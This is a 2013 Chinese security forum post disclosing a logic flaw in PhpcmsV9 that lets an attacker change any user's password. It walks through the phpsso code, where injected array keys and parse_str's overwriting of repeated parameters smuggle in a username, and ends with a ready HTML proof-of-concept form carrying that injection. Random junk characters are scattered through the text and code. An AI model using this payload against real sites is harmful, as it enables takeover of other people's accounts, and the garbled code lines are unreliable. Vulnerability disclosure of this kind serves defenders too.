找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2005|回复: 0
打印 上一主题 下一主题

PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 14:46:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
提到的通行证的代码:9 |6 A9 [( U, p! l
5 b! `0 n. m# {$ S4 J
' C: V. X8 C  \3 X8 D/ _7 `! ?5 ^
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
2 d1 b3 X9 L( l+ E3 `" [! [, c+ ^5 m0 f) I) {
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。( C+ S$ c4 X, {9 q9 ?

! e& y4 C* j* i6 t6 O& l' r我把它留给了你们。# Q1 h; H) @9 v& @+ a
不知道你们发现了它没有。6 _2 q+ C2 ^! |; R& y

7 a6 h) ~1 O$ n我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
+ @& C; w( z2 E* n, N
1 c8 g; z( }* E2 y所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。
: g9 m6 I* Y' y2 R- I
, ~8 m( u7 Q3 w9 d# Q也就是+ k3 D; z' F% F! h

/ p8 v  F  v( S2 P% ^username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。3 O4 l2 [+ f. r1 [+ \' ~/ D

8 O  F$ E9 d7 \- s; ?要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。
' x3 N+ _3 N0 I$ d! W7 j
+ S% U  b$ Y. ^3 k, R7 t
+ e$ b% ?5 [5 b" m9 `( a其实我们有这样的机会,看看代码,如下:+ @; H7 U2 j4 |) ]8 l6 s2 m+ x, n

- O, z! g" f, x; \5 _7 M9 Y8 q, c9 e* X' o: N" c# T$ a% l7 Q; ?3 ~
public function auth_data($data) {6 H8 G# n* b' w6 B& r9 W$ F1 p9 }
                $s = $sep = '';
- s& Y' l1 c; r- g, I* n                foreach($data as $k => $v) {; v6 d  t0 I5 u4 |9 k; p; n
                        if(is_array($v)) {3 T. V! ?, i- Q7 r* k, a, v
                                $s2 = $sep2 = '';7 |( L: l" i4 @+ p
                                foreach($v as $k2 => $v2) {
/ g7 I) W7 i: m5 d6 u                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);) t  }$ z+ ^4 c4 y& w  j6 p8 R5 g/ J
                                        $sep2 = '&';
; m/ K8 r! E' @4 q3 ]: K& E                                }9 T: h3 @% u. n" b' e' S
                                $s .= $sep.$s2;# S2 |' w7 w( U* l. `9 ^# v; W3 Q
                        } else {/ k+ \7 A9 B8 J# F
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
; o1 q- P* v; R" v                        }( w7 d( H2 T2 h8 y1 \# V! S
                        $sep = '&';
- X8 J2 y% j% g4 m9 }" Q/ H6 W                }
  c1 t$ z1 ?# e8 ^3 v
& r  S' g, Z! W9 ~7 R4 d" R                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
$ H  E3 P4 J1 Q$ S) g3 N                return $auth_s;
: Y+ M( C; q0 T' J4 ~: a/ D        }
5 h" S) Y) [% l; ?
: G# e' r8 w: L6 M" x. d6 i可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
, l- S1 ~: F( x5 e) y
* `. [. H( A+ l' q举个例子
# S& ~  q0 e# H% P
& }+ x8 B% r5 b$ z4 }$ [$a[aaa=a&bbb] = 'a';
, V+ t" f, o. K3 y% @; U* k& [
0 I, ~; I. G2 u2 h0 z( f, {  `4 _会变成aaa=a&bbb=a- G1 l7 M9 M" e' N# g

+ v& p. M3 v1 A5 c) ?5 G明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
2 a* V1 b. G0 f" R- U# |5 B
7 n, o  e2 l* a$ n# }这个时候,我们可以再去看一个函数。! o. T9 K! y5 z) t) a: j3 X2 T% H

( J+ s. i- h' v( _就在这个文件内:
) q4 h7 x. x6 S3 c6 y
% q/ t: s/ E# V( _' O& @5 l) E- W( W( s
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {0 l) `; k& F/ r0 k* u
                if($email && !$this->_is_email($email)) {8 q% @* I# v: s& r
                        return -4;
% Y% }6 m! f6 q: d                }& N9 S% {9 l4 u8 {  h, |
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
% D' u) f; c0 s        }, E/ Y5 _/ @( n- |/ E& x8 ]8 P
8 {7 U$ D% N9 @  V9 r9 t3 t6 B
这是向通行证发了这样一个请求。
  J- ?9 ], x4 V) T5 `* z
% X/ e0 K% _1 T; p) m, f我们再跟到通信证代码里去看看,就会有所发现。
- W9 k0 Z5 W# ?4 R( M2 z& E$ C) h0 `- o, e3 r! }2 ?! k
  a2 ~# @* @+ S' A3 e4 d+ D
public function edit() {
# C9 P4 L: y) B# G7 w//能省就省,太长了不是吗?% y7 W7 q( W- M
7 A5 T% b0 N6 b# {6 y8 [
if($this->username) {, y8 D6 ?( g! v- Z; v, c
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。
- q$ R& N1 N( [5 M7 K$ b, ~5 q1 I2 I                                $res = $this->db->update($data, array('username'=>$this->username));( n8 O' a4 R# x; ]) t* x6 o
                        } else {' t: \5 h/ y0 k3 Q0 o3 y
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
( ]+ F% s$ K5 U$ q# A# q                                $res = $this->db->update($data, array('uid'=>$this->uid));+ |8 ^  e( x' f& M
                        }  r: g4 k$ J6 A
9 s. x, u2 m3 E
好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
9 U! U" f; {8 i5 u+ S; A. ~: J9 t2 s2 c# s/ Z0 t6 w5 _4 f0 j+ U
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
' X2 T. ?  a" _$ w, T
4 V$ T5 i$ c+ A7 w8 R9 l$ f很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
' X  n2 @6 \0 A9 f& v' T8 P8 h6 o% V: |  D' b9 O
我当然找到了:
! c+ g$ p2 f2 D# Ephpcms9/phpcms/modules/member/index.php
. D, Q0 {: ]9 r% N- D
% j% P. q9 Q& Z$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);$ \! i% p, {% z5 A! H4 H8 C- |

  R  W) W2 X4 m. V7 h' K然后就没有然后了。
; S5 s+ f5 O& |- D  ^
( v- w0 W5 P- b' I<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
0 H6 C! l+ {" g) m5 U4 ]                                <table width="100%" cellspacing="0" class="table_form">
3 t: w1 P( v9 z4 V                                        <tr>
+ A& m- b( Z$ E" H* B                                                <th width="80">邮箱:</th>        
# ], F: Z9 W! o                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td># g- |; e. m! @1 u' s" P; B* ]
                                        </tr>
* x& D2 V* ]! W                                        <tr>
& L# r0 Y3 f! d% W  B- r# r                                                <th width="80">原密码:</th>        
+ p& G( h8 P5 D' `                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>* p7 z# v% {& H" `$ x4 t3 {2 Q
                                        </tr>. f! g: w/ C" `" ^% V- n6 y/ Z4 O9 z
                                        <tr>
- _/ |9 `  `3 a. G3 b7 l9 f$ l+ A                                                <th>新密码:</th>
# q) G: A7 o. B6 t                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>8 l, j6 u* y1 s0 ^2 b2 [  E$ G
                                        </tr>
$ E. N" _* E3 g( U                                        <th></th>5 ], c3 w( {( f
                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
7 N- f: I: B! `3 H/ {' L                                        </tr>: v+ A& j) @+ ^3 ?$ q) N3 l- ~
                                </table>
2 i* R- v& |9 X& U( p" A& D9 w! S0 T0 g; c1 M
                               
  E$ L; K6 M1 A                        </form>
5 d' Y% f) e. u' Z+ K# |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表